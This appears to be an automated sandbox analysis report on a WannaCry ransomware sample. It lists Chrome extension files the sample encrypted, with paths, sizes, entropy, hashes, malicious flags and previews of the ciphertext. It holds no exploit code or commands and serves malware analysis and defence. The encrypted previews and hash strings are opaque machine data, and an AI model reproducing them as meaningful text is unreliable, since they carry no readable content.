                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\icon_16.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):424
                                                  Entropy (8bit):7.427969040817298
                                                  Encrypted:false
                                                  SSDEEP:12:bkEz4T/AQtDFzZKUpRteLDpD/7bTcFy0o5LD7f:bkA+pFzZlaLD1fTc1oZ
                                                  MD5:E659F6299034E0F59205E43BBDF27894
                                                  SHA1:7E9C2A8BFB92AF4BEA39179C79B2CEAE3F9D5457
                                                  SHA-256:1A18EA98F1861AE0F0907E29D6D75E263311DEC105662696550F89CE658FE0F4
                                                  SHA-512:7E12C0E48F703813548E2E8856D27757BE026AFBDBB1D217E9DA96758FB69F5CBFF56007EF75C513F5E28FEF025FEC703B0E9F2D7CD05572CE36797122F093C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....F.m...m...B.....y.:.....;....x._.z*.,..9.7."..5..^...3..U.._.......n...1fb."...'U.g..ed.5 .....*".c..l....q..Lu.,.........d...&......Y...Co..:..,C%V.Q..O.z..8y.Q./.'u}.....P..D2m....1Z.z.mf..F$...^*..r...@..m.%:.2..K..Y;..w..<].lP.....)...`I...............aK..z.=|S.....z$..=.1:..(..xS.8...2...Z...P....X,.>+.v5.o..b....i.f.+.eg|8.hb..`#.?.Up8f..N.mj..y.&/.#.y...`+...o=U.7.....Q.5$....2..6.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\main.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.345775413138981
                                                  Encrypted:false
                                                  SSDEEP:6:bkE0djGN4JTNH87qI8Y23zqcllQcT17Z7HInOfoO/IXJa+3vaNoydbvhkz0dlXYn:bkEEGN4j87qI8b3ucljphHInOfG5a2ZV
                                                  MD5:AF5346E6E9D0D52C5CEF0319E97417BB
                                                  SHA1:9B34F567C767DDE22FB8EA1511454927F5C1D5B9
                                                  SHA-256:9EE8DDE93F4BC8A28D2D6694D4B78D65E55B19AEB62587C0B8B8F371871F2846
                                                  SHA-512:E05E5C67B1C2995D84DDEE7AB008A973A445F02BBC04B194EB9842A9BDE7A643F5D002D1B041DCEDA4B86516AA8484FD3F05419D31569E998BF8AEDA80B4C849
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....#~.`.Xm.t*.O,2-.L....@......=..5.&...P..e.......y}.b.6..J.T!...JjN.s..Sh.p.M..@.CgC{.w.?....r..n.P......;.G}....u\<NSf...SX."..k....t...y..r:....x....0y..\.&.k....|....t...y..N]./....4.A....s..}.(_..j..d.8.;..C#c3.-.,RBA[..^A.OXX......c....[.......d+r??Cu:.......IL.q.E.\^l.T.;.;......9..^.c.[....mf^_..W.O...T.....Rx.F..<Q....w.2....0...

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4200
                                                  Entropy (8bit):7.958160411774594
                                                  Encrypted:false
                                                  SSDEEP:96:okEwimMschbEhjdgYNLFklyLN+eWswfSo1pcyv:zEfmqhbEhjdt6oN+XTxsyv
                                                  MD5:553C4143A164A1585F93DF90D82E5FAB
                                                  SHA1:BB3BF18DA1D5D08AA88E447A7DE26EB99E9F8913
                                                  SHA-256:5D5D44B3ABDFDC30516A6EC0BB1884CCF4CAF8C8ECFF3332B321479865A51A5C
                                                  SHA-512:AFE1C913E28E08EBA95EDBE43395FF00CA706CE23C1CC71E814814D7ABE1B39139F54DEA7A0381A35474C6B59DEB021B9B05011FBF3A1AD2EDA8592E95BC4D9F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........r......)t..2........JU`........m.<,D..{...,.Cn.k@)..#....33.#....5.;u=.e.R..6..U.j..f.9Z_o@..%.......;.7.g.............C...f...t.?._R.x.cv.....0a|..Tu...D.7......k..w..|u.......C.....`<z.'.n.)_D..)..w;2(.....vp.>._[N.vZAc.[.......5\9.O....'....D.......D.F...X.8 ......p..........1.......^_.9.wHXt.......L.....)..'..&../#l....D.....*W_..X....l{...[.j...PL.u....=.G.>+$I...v....lr.!m......Q........2.L.;.....D.rY.......\..|...W...M:z......Uk....z....C.VY....^T..c.5.z..x..b...e&v.8.W.Ul0.7..@"b!..q..<W[ME..*..ow...+....`...lEs2..^R..a.>.}.j..@`...a.p.}..an'.-....[..%..k-..NHwHQ...h....6..ix....vB....r.E.h..?.Lr.3..i'...H.-@v[.'HY.5.4+G._..,.....c*.j.Kx..x..?.U.p.:.>j...U....eMhsR.X+v&1i..:.....o.k..8T.kwhV....9..$>.x..kW..;..=...E..6...@...7.Ok7..\$.4..7.......n..g..78,..GD2...p....`..":.....b.o.....i{...;....\.*.7......3..Z...TdI..;>p!X...9..+P^N..,.h~b.....?!.2..i..9....'Ot....@=uYY.{.U.\...=".{...=.1&..CK.z.#s.H...JH..V..M=$

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3688
                                                  Entropy (8bit):7.949644833586689
                                                  Encrypted:false
                                                  SSDEEP:96:o3te+1obWAOZe5i94fV5EsdTY4tSJrB9iZoNHFVLvfHA13May:Yt11UWh+EsqxB8ZYDLw139y
                                                  MD5:795CC8EB62F12C04C883D6D508109BB6
                                                  SHA1:E1A68A134F2F8D955274CC4B9B6D144477C4ACA7
                                                  SHA-256:2450005FD832E5C90D6C86CB4AB8BE2BB33B81577F827FDD6D7FF361D163C61C
                                                  SHA-512:602AB1D1C682EA392B7A9F6F1CAC9A2F6D9E28888A349CCF768B29FC742B1258A14AC4B613F1A18C85569C319758DD7CF327B713C3B112363A78473F8F686643
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....5*....q........J...R..m..........).<.&.10..m.Z.....d..,...b.=..1.1...r....Iqa..0.....G.....>J"..=.z....io.........x.W...Wd2,?./mi......#..a.?...v.x.[...-...|<..mMj..gW_O.4.".$ v...j....2../....b...B..!.C.%.....N.........9lO..1..#O....G8t.......;....M...........6..:{.O...5......y<u..3...4.(n{.<.s.F.....D...P.....V....7~......L.2w.....(W.0,HH.F.:.Px<........C@.[h}.;.T.^.........V\Wn.k.&.Z~C}.P2k....}o..\V7@R.'.N....H...I.+q.w5...o.)...2...7g.0......,.%[.q$F".._..H...N....4...M......../..g.....F..'mQ.).3...l..B....k.[.+.6.=...i.9H%.m...,v..C2...*..Ao.......+...f......ww..-[...AQs......vv.'.Q...sI.2....C....b....#._.#.vo.W.Kb.+.....S....\.&.\...$..b..8..W...I..b...s.#.....wx..!.1U...A....].D.}...q.z=...M....<....k.l.d@..<.r.v...i..."qh.....-D2...5..m..G...R......}g.*..J..f.....5h$..L...b..e}.....N.<~..=.......a8....&."...2.>]#.R..y......$.R$.{l...'./p.4.!....V..L.K ......o`4..Tf[...<...t..^.ddx0...R.`.a..aEi.B..S.}Z...k.....B...e..F..

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3688
                                                  Entropy (8bit):7.948892727004841
                                                  Encrypted:false
                                                  SSDEEP:96:oJklJ9BomhJnx9vh+BBtbas6RV6adEdOKF:Fb9BosxPpobasG6aep
                                                  MD5:239464DB7DDE0FAAB6296AADB8D6E67C
                                                  SHA1:8D85E4ACAC5B584A5EA267F2DB3AE46EF16BE56D
                                                  SHA-256:9307FB788A41ADAF7CCD6A57C6780CE979E4C56793C27E2D77ACB1D811466580
                                                  SHA-512:8E9B94D1D47915670F4D3C6888E9469BC575AD337F6B75399165ABFAEA0AD55EF2588755DDA4896FE99848B60EF07C4BE1118363305E0A0CF1D577822F1C05A0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!............[.I.3.p.W`z..n.K...^..n.......@1.QwW&.....H[...l.s.W7......{6...@u.r_+b.3f .X.U.....5..>...[s.......G..V,.O........9.V...$.j.."S..B+P$.oX.}.93-S...6B/{Qx..JP.i..".22.$......4.....u..?......i.....6d....`X.Os.r..5A|\H...b...9....ft.......H........M...B...Z...j...<..2..!.....=....|KD...G9....4...m...U.Y..V....w..Q..Z.;..-..;{6.tg..mmA.b.Ze].|..8._hU..IrXhK.U8zr...4H.0....j7q}....fS..q........K...q.'..,....S.vu...A.?....2.../q.!^.......&O!^,...f./.)...h..:...B..>Vp@...".K[j...r5.m......."...P..j.mFn).@..{..>LK.....&Cvra.{...h9J..xi......%..S<@W....N.&..Y.......+.C`.#e.s.*=...1zU$|t..B.. .......*Ghw=\.+........-.'.}.....-.>....b....)..C.G%.U.V&..C.O.....P".bK..-.tu5..FR]4sA.{^.X.8D~.Q..U....i..3...lE.:X.j.......0.T.TP.:Yy.f%.....{..GV."Ob....3{.b;. .6....!.L....BHN.SiH....j..E....;j.(V.V...?..*.0..Wx4V...GN#j;.I ....Y..p.D......p0?.+.c;:.d..z.]6.s....9.G.vn.:eG.......d.t.k.u9.2..~G8.....-..Q9. .T.C;.}.e...y...Kd......\&L..?....

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\icon_16.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.418526675257306
                                                  Encrypted:false
                                                  SSDEEP:12:bkEbDVvyO4pvdpuBxi5PtYHKjCHcS3F5JxoFv:bkMVvX4pvTcOPtAKjC8UF5JxU
                                                  MD5:A46213F5577DBBF0C4D499B71E566DE9
                                                  SHA1:F432C0A7D30D66A52DB692F3EA53844C7542B860
                                                  SHA-256:BD53D0EBAF56A87124B780DCE2EC0E42E78A7CB9032B3163A80C536487783745
                                                  SHA-512:5AA6023009AA2DB7A951C45941A289C98EA680A226BEB592D865F8DEBB376922C4D22FB46F024BDA919C35E2D927D35EB072A4203698FA852553532C835E2ADF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....8W..3..Q...b.2...(sb..We....7W.k9...&:.#.....7...6.\.......i..\..A....]e.R.`.KSD..YnB..b..........BV...MJ..9....]].0m......@..w.e...<w<.......`..7-T.l..'i.7.#..X..`..".iBVB..6...N.#..J...8...l.,...q.y..M...$..Klc..]/nBK..?65cF)'.j.TB................./Tq.B(..5.....ej.........N./....J....Kj.V.....H.u9..i....;...b.p...[..JSS.<sh..... .......n.....#j.o....(.W./3/...-..r}....B.p....X.8fG).5....x.}\.R..>..

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.359725180420463
                                                  Encrypted:false
                                                  SSDEEP:6:bkEXp0QsdWET67JuTmtVCUhoRXHYzP6eo5p+jqyEsvjZo5gqbEKWXyPT2MpeIf:bkEXp0jdmRtVphKXUP6l5p+jqtsaqqbF
                                                  MD5:92E91A7047652C65838BBB34BD46278D
                                                  SHA1:2769B4BA26979D5009748CDA6906E119D6B8A7A9
                                                  SHA-256:68CED54483DEE11E86F5B8631D6DE4F102752CC39D23FF2DB04DBC898F661C34
                                                  SHA-512:404531F1DCD928A7DA8E64F86FBC7D611701FB8D09F7DB369DC1DBEBF9DBEFB213C526C49F45AC5A0F9F3287728A810A172758729C429D60E4181784BC6FB9DD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........$.e..Av.O{^Q..E.,..?.I..q..#..T.`.`..H.... ..M....l2&.t..29"I..../......c.. ......a..^..&C.u..=B..~t....1...9........z....j...n^...k.e.]...N..~Y..!..|#N.f..>;..P.9[-....I.j.b.....O@Q.^.3'..~(..j....+e.:|:....[..(1...0y6...g...............6...._.......X.FN...._.:.W...Z..........\..6.=53..)>K..Q.g..*jT..TE...uW.G:....i.6`..t..eu.d@M...y..I

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5272
                                                  Entropy (8bit):7.965488862334102
                                                  Encrypted:false
                                                  SSDEEP:96:oOv/+LuxHIWr9NIVh6dSVqQLp/IFHcnK1oqfSfhC87uGtleDbTJrKt7BOOy5DC/O:9rx7M36m6pGKaKSfg8nwTsWLrP
                                                  MD5:D58A813FDC97A6FCFDF9DA34BF4A0FB5
                                                  SHA1:C9B681092EDD9B7705394076C38708DD9B269BEB
                                                  SHA-256:EA33911144FDBC0E70721D14B8AE2544C723DC52816447F08542DD2F9FFA1463
                                                  SHA-512:70BF9DE8486AF5AEC8CC285C91E45F051C10280803B367B320310ECB8E2EDD1B001980ECD32FAD8F941FA77BFC6A195D4E6748F81B2813D7EAB4BD9EFFB63A03
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....4.k.;..C.I....:Dq.D?.....A.ZIL..._...K...,{nOj...ZI...<....P....f...Z..`.........^........h...3.o.1..>yU`s.|(._..W9.;.......@sf...Wx..x.>...1.XuI.9..k..t...t.o..V...c.hm.r`.......w9J2."LKu..N..H...$...Q>.Sq.'.k........n..Re........a...SS.1A....v.......{Q.WK.d.n..nE....LM..V......J..t.../g.n.b........p.D.B...].. (?.xY...YD.,_.!DG.nF.....U..v.+..._.P......^.Zs.x.W.....{..<.&..^:....i..Quh..S.#....x.jL. ..p...D....m......44G.K\.Wqc."Wr......p.7z.......u...N........q3@.....2N....].t.. %.t.3..M..Xv.0.Bf1..\.f2dD..'....p...*Pm.R..+..{....f.EuO.?X..Gc....fm.5b...o6.....s...t.Q..}..}.m..Y.}C.^....&9zz.....m|.]5..M.7:q.p.....t,.k......h..:.q..2......6.m.`H \..x..}9W....=b...eF.....O.TH_R..0Nl....Y..T..O1.....g.$0..k...I".I.........~..Q.R.*o.T8.$..p.[...n.Yn..;...!.A..6.0..*..........l..dk...1,..Q..m...f.6....K.A.....ax..+.<_.0..g.!...\..u[|.RK.k.....n.-[.$L7^....^../Q..r.l.u.6pO;<.!.....#.Uw.....b...Mw.+.uu...l$(`{..6m.&:[yP

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\eventpage_bin_prod.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):63944
                                                  Entropy (8bit):7.9971548536712005
                                                  Encrypted:true
                                                  SSDEEP:1536:RSX9jxi9/KMFT0ZdKenHNLCGyc7DWNZmNPb2XyIMVXMtRRQ:RS1xi9SMmKCtLty4kw5xXak
                                                  MD5:5D3CC0477FF4C902D9E7508CBE2B6C76
                                                  SHA1:03C9FDE932323DF2254D1A2A8F850696122A035B
                                                  SHA-256:F2C21480C2CEBC3241FFDBB4303B0BFD8B78DD8A89858B78339E3CF137ED296C
                                                  SHA-512:E81348BF5699D24415A4782068FF4531F09CABB5F835B9C12A861112E33B5ECF1A12001508F379D8F93E42BD8DC552B41654486D45B3A8FCDB47DEB73A35690A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....[.2.)ey....Gm{".....o.6...6.....Ax.Q......~.F..5?XCV.~.w..M.*.3Z.p..+[9>.....Sur..I..I+..9.....f.....j......PM..f%..w.}..`Jk......1.....V..B..04.4...>........A.k......YL^.g...~.5..X7QQ@.%.V.u.Oq.G...J.l...VX.W.PQ.7....N.u..Y.^.(.|Y..V..H~....c............j.....a..{..\g...$..rfF.eu..v.].,...)..*...).+.;.'..y=.Y...c.Cf.....8S+..x..tM.o.}V.Z.Q...j.8v...IEf.l.b1..KT.1..K....7.Y..)...t.M......*.Z.....P..\..1.M.>..a}..S.{.T.Dz...V..^>?...>.34sE{.>.,.E...e..Y.P......j..0...!....'-b=.(.uk_:"+.......8.....f....D.B{.....$l..V.\s...<.......Y...I>2..<.5.].u./.rHf.*....}...Z...[6.q.Ng&.,......7....yc..O"q{..i.$.....{v..S+Em..G...H.?A..@..*..=.....PL{....]~T.I#.O.\..?;V.......)V.r_m...%.l..O-|.5....1..2.w..._Q...]j..?i..|.Y{W.:.4)..U.k.~@..6......#M.oK.F....Xk.S&.I....i..AbLl.....E.km..GY....c.o.....'% . .p..W5]......K.D..|....P.7.n]%O.S....+..obq.Y$Z....ck).HQ... .T3.&.......!.."...{.907r{..057.........9....../c..G.O;...0.9.p......sP../.-.K.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\page_embed_script.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):520
                                                  Entropy (8bit):7.561408031862071
                                                  Encrypted:false
                                                  SSDEEP:12:bkEebdkWKbYRxD5gN0g/Ve1EadGjREJ3Jr7v17pgAHqlhR:bkrqR6k0FrdGjREJp7N9ggMR
                                                  MD5:74F12110A48CC12B4109503BAA181FCF
                                                  SHA1:ED4EAF3625F3164B37E81FB23CB7C161134F1119
                                                  SHA-256:4375005031785B4F0D18F5C5EC184D278BD323E959C86246BDB4CD0CE8F1734A
                                                  SHA-512:0D3C0E8ECD94FB011F703BE4A8A9A5FE1BAE9D26414F4E6D70731831792F16B9B2756D5B56EB4C42D692052CEE617B057E9DCC4254CA36A7BF3911F7DC5D6045
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........`y$.%....#.4.>X.A..._CB#..,...{1.Fd@..+.'..g|..?..".J...|J..s..".{..J....Wn.....h.7e.I.%.3.ho..G..J..l..^...........7.m.....]k.n...X>..._&.g".=.....&u...dH..%i.=c.L.(...3H....}...E...5.J-3..j...P.&._...ab.g..nc..........`...r-2[Su[*SJl..................1....j...?......Q..7_.6.]..O.,Zo.N.8.}......Ky.D~@...q...V;T.L...m..U....{...+.?pT$.U.N......K;....8..|..73~..x>.%.hM.Q6.D.V.....=..<.4.K7..w..0#.@......0l...H.5..m.c...%.1,0.V....&w.#...s.&.a.$7.l..Q_.b1v=5t.w....._{O.|

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):544936
                                                  Entropy (8bit):7.9996523124749555
                                                  Encrypted:true
                                                  SSDEEP:12288:7OIVzFqqwqv+yYefk3qw73Gd4nc+Vfo1Aw6K9HQT:7tBqTq2hlTDcN1AlK9wT
                                                  MD5:A3A9832325D99E13B3323FFDF0022E53
                                                  SHA1:AA49C63F5EB6D94A47CDC0509941BE310BA12227
                                                  SHA-256:57987DC400A0C577119075A80C6B4FBD0C22838AD759A4A73BB453D24B2942D9
                                                  SHA-512:4C7F1C1687A7AEB3F76C54E0EBD562C51965EE5376817B0FAE8340ED808F17EABB8A3F1183B1298082EA5AD3D9068A54C9D389D6CA691797B705CFE291317883
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....8.#.P.n]..$c.m.<...=..+..J.36v.JS....D.m.C..d..,e..7..t....P%..F5}.'.2.i1.+.I.U..T......[./..B*(C.....z.#..m...W..>xO&..k.z..j...c..&..W.z..68...=..L.1C.9-I......`Um..7r2T..].zrM.d....g.....P.(..b.QR.S5.NB.....,....H...~..}...4..yX.z.M.8N..-..c..E.(/.....O........*V..*O...B.S.....-.P.q.!fG\h...n.v..72l...6A....$.Y..*>..@. ...?...".. .Pmw.fP.{....q..y....J~E*>..Y#z.:..}$@......L...{..z>)G{..H.....#.z[X...L.v,{.=.....:..2.lG.hd..x..Uu....d.C*.u..!M.F..HbT<Sv.s)\~o.}F....+.........a.i:.....#,X.I.0.X=..d.m..a..6....E)..Y1..e....rqlV...]3.....<wj.o.{.K...p..`._.U.<..M......e~..,...........k......t...g....*.+<..V......d...m...F=..*r....|J..F.G4(Z....Q.n\.....>.}_.!WR]..A'p.{.8..?Cs=+@.9,.E...;.al.v8h..T.jx.d:...].f.a..k..D...1...7. gM..)...w.g....F.S.O...L..U.5..........q.o..{#....`.....q&.E..q........wQ...".F...[.F.S\.......4ze..Z/O.S..~.r..7.nl^|fQ.ry.L...w..4p....G%....E...R.|/..zk5FMt........^..(..?..^^...D.P...."...rf.........q

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):261608
                                                  Entropy (8bit):7.9992668670741836
                                                  Encrypted:true
                                                  SSDEEP:6144:kHqIXtPuJ4+wbcRx0DH4or6UWqzNhCgIQA1VKIc1VYqLR9XXJbtcQg:kVX84rAX0DYor1hhCgDAfZc1VYmXRt1g
                                                  MD5:C01E7A6072142811572B03100EF90802
                                                  SHA1:F0D069E86232C137ADE078C71AC44181639C09A4
                                                  SHA-256:02E420687A6F9280EF96E208ADE2A35AA01C935ADD5244117A36C9CFDEBCC8F5
                                                  SHA-512:FCE74BB7D5B2F565D25A4DD430EC56A0FDAB86DCB17C3EA8F00BBB56AD182773F636B7F82536B057C6EED1488DC21B1335FCBB903C93DE16407BAF5A12D4F7D3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!..... q.g.D..K.^.8....s.I..F...z;T<A..*.2.m.iU..1/-.r.....y.h.J1}...S.q...3.c...0Y.N...O[.D..bf.....4v..U...*.d.d.5(2....0...O[.F;..F.RR..za..[......a+..e"...<.4..9o.s^DU(N".........0..U.6R@Q.".i...z)]....0.,.I.W.+....}{.Q-a.g...l.^..8..b.\)...*..J.............!....'.........`kIY..Gg.s.z...9...?.e....L...+.!@|.,.{.U............@...y...q.&f....N.-0..@[p.3......S.......CbC...w..FUa..!=h.#..o6.=c...: iDS.....T.D2>J.."...W.D.......S0...g.`. ..N6,....T.*....p...(Z8..a........3..|s|....D.....(..EO...H...Lf.XHG^<..Z(..R.....^u..D.u...r...F..w!.....W.b.Z.1.T...V.h{....1p.M.Z{.....>....P............c8...F..^....N.,...S.ML....];..O.......v...a.MR.ax;a..{....J.P...."^U..%......`..i....`...I(..P.F""....z..R "...nu.V....2.......JF.A..........X.Z1;.Sn....=@..'.2..C.-..B4.].Q.YG.p..u.....T.d.d........).b..3....k.4#".ukQ.8....sgO.....b......m....1.ed......W..q..wK4.V........{I\9.'..d..N.o..<....D.*..c..u4 ..<.!../..y...^....U..A".3...phK.V..d

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):70648
                                                  Entropy (8bit):7.9976071454342375
                                                  Encrypted:true
                                                  SSDEEP:1536:tMr5REwM0IOCSDhufj/cMvruiqLylD+gVg9yeoCwDSLdqkCIWF:iNCpOb+jDvcUDdg9yeE2dLCIWF
                                                  MD5:3ACDA06518829D1FDBB99EC40EB559F8
                                                  SHA1:61682B26535D5E6D035FA682C46005938A8D8159
                                                  SHA-256:EE0CF8F58C6E832B090993A234F0592441F595FBF5B5738A646B3C2768CAD469
                                                  SHA-512:2024B07D3ECB70E8FFCB6CAEB7F7D181A9504F1DEC5AEAA1B4D0CC82724CC0BFE10B18471FD0FD5C04C3BC3C95DC49B4EA16372AB64488A054DA30A3F55B969F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......^Z.u.....A.3...._.{bJ..n..4YU.-....;w]...B.!.?.nC..8....t..5.b..|..z..Z.."...X6wH../'.>.n.....x....eq..7..,.....7]n"..^2...f.._0....,.X.,..t........3Y..ln....8.FHk%N....}#...i...}n .#.@..3.YQ0.+.y.".U3%.......r{EGr..[z...$.....c,R_.A2......8..f...............p.x.....[*.-.\f%.oM..#..>..P..... &....E.....rc...".X..NI...qt..X.W .%D[.....P....7.B.._...Q9S.I.C..z;.....f`...a.....J.2..9.P.A<_e.;...H.Q.'.....08....Wl:...Z..=......t_..U.?.^%.@ho6....M.X.h.xW.K.<t.s...X.l.eue.[...X..<.g<C{.....1..M........*C...A...i.4q.......E.n5c1Hkb..p....D..g.._.L.(...Ea......w...q.|&'zaGnz..".M..1sf..3.".7...f w....P...c...f.:~..]y.Y..U.1$.;.]U.6.s85..B...[..*.L.7"C......I$i ...v..uq...7..v.8.........KI....}...q.R.......~.O.\P"......G...Ax..^....y.,..h.z..2E....&Y$n..<T......Q..]"..>~...c..MI...4.V..6'7...~./.w..o.{..O...q.U1 ~.Pu...P.YG3..p0f.e.|g..Y...7>..rs.,...s?..!..G%..pW".R.bwG....:.S'y...F..V*(..g.(......w.R.......+..+.G.R...c.9\..#.Xy..1.X.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4648
                                                  Entropy (8bit):7.958976793710235
                                                  Encrypted:false
                                                  SSDEEP:96:oB9It7blUb4hzavn5GpdBhCUnw7VXE8uUHjqQavqsSOd589Ww:C9Iob4hWm7w1E8uejqQsSM89
                                                  MD5:56E6A5C1788CA51FABB2DECB9EC094AC
                                                  SHA1:A4D3C700CF0A47F876DBD261BCDDF9E387112F35
                                                  SHA-256:4B58E1C337600F238D2B48C73BE13A4D1E18657820CDC26DD2AF0C5A15717E3F
                                                  SHA-512:A8B8377DC76BC0CC248930DFC8EB5719090FBBC393318019A2DDE801398E47AD9EC055AECB84B047D6BE6D929342C6FF79BBEAD18FE1DDEA741D8A91430C310D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......\.2Gn..Pv..Y....F%...X... ...c.Y..Xi(...&........e/......e.[..lV..4..8b. Qk..M..(Ol...r.%..@.5.#EP.#.)..F6..e^..C....C........4'....w....c....l.........r@..yjx...u@.f..=..5.3r.......|4PV.....y9...d[..~|.&.z....;.A..xL.N'o.7.2$pD..c...6h................F|%.r...z.N..|7...]be-..F...c.c.\.b.Y.tN4..i.8.<.3...(.......j.1a........).K.m..........P.....|^.Ol..e&>.,..{....@.&.Z.5.......n`.2..W...f.....q.P..Y..mln....etf..:.... ...C........a.........J..=....H9~Qz..}....9B............WW$.6.-...S...}.R.F...Y"g?.O!F.C..G".7.6..{..v.nm4g6.5Z.2.+ZL.......xL....vR.)..G.B..$.....(.~amw.R.........i.....*....i...E.h-.U..#(........{..`....a...v."................`0..Uc.\..?.L..i!.Vf.;U.7T....k.qn.Vc.Nr.A4.W.......Y.fq.k.....e.G.tz..j...^.k9i.L.......L..._...I....T3.......y.".d*.pQ.&.Cx^.gc..7-.h....E.........f....SC!....c...u.F.=.*..9...i.7R.1..q.R.'.......X..TU.....uc....E+^../>.".1&.j..l....).J...li.4O......=...&..'...(.....G.idL.O.....(.Hx.S

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):840
                                                  Entropy (8bit):7.765386388783059
                                                  Encrypted:false
                                                  SSDEEP:24:bk2xLo+m2NPRUHgSeuKpNr4TZW5yDvpZAG1vjDtc:bk2xkYNPRUWFp54Tsy8
                                                  MD5:949AFF577FD4C6A677BBA6DEBEBFBBDB
                                                  SHA1:81AD6C9253AD036756E82C63EED1F521EFF04D09
                                                  SHA-256:41BA789BD7F7A175C490E903E172E7072F0C65CBAE3FD7D1E7EECFE6FD86F963
                                                  SHA-512:75FA44B6E4C9F982F75F085ED576E6210BF887A87596266AFA67E4A2B3AB562A3CCD4269698B3EF4B8B096FAD3F8DE7E09DD2EFB1A0B70777486944508FFF444
                                                  Malicious:false
                                                  Reputation:unknown
